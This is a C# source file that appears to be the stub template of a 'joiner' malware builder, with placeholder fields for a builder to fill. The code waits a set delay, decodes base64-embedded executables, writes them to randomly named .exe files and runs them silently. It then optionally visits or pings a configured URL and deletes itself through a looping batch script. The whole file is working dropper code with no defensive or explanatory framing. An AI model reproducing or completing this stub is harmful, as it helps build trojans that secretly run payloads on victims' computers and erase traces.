using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;
using System.Threading;

namespace ExampleJoiner
{
    class Program
    {
        static int getRandNumber(int num)
        {
            int randNum = new Random().Next(0, num);
            return randNum;
        }

        public static string urlRequest(string url)
        {
            string str;
            try
            {
                string end = "";
                HttpWebResponse response = (HttpWebResponse)((HttpWebRequest)WebRequest.Create(url)).GetResponse();
                if (response.StatusCode == HttpStatusCode.OK)
                {
                    Stream responseStream = response.GetResponseStream();
                    StreamReader streamReader = null;
                    streamReader = (response.CharacterSet != null ? new StreamReader(responseStream, Encoding.GetEncoding(response.CharacterSet)) : new StreamReader(responseStream));
                    end = streamReader.ReadToEnd();
                    response.Close();
                    streamReader.Close();
                }
                str = end;
            }
            catch
            {
                str = null;
            }
            return str;
        }

        static void Main()
        {
            Thread.Sleep(***);
            bool autodel = >>>;
            string url_locate = "%url";
            int type_locate = %type_locate;
            bool url = %url_state;
            string UnpackPath = @"$$$";
            string[] file = @"###".Split(';');
            for (int i = 0; i < file.Length; i++)
            {
                try
                {
                    string name = UnpackPath + getRandNumber(3000) + ".exe";
                    File.WriteAllBytes(name, Convert.FromBase64String(file[i]));
                    Process.Start(name);
                }
                catch
                {

                }
            }
            if (url)
            {
                switch (type_locate) {
                    case 0:
                        Process.Start("http://" + url_locate);
                        break;
                    case 1:
                        urlRequest("http://" + url_locate);
                        break;
                }
            }

            if (autodel)
            {
                string namefile = Process.GetCurrentProcess().ProcessName + ".exe";
                string namebat = "0.bat";
                string telo = string.Format("@echo off{0}:loop{0}del {1}{0}if exist {1} goto loop{0}del {2}", Environment.NewLine, namefile, namebat);
                using (StreamWriter strwr = new StreamWriter(namebat, false))
                    strwr.Write(telo);
                Process.Start(namebat);

            }

        }

    }
}
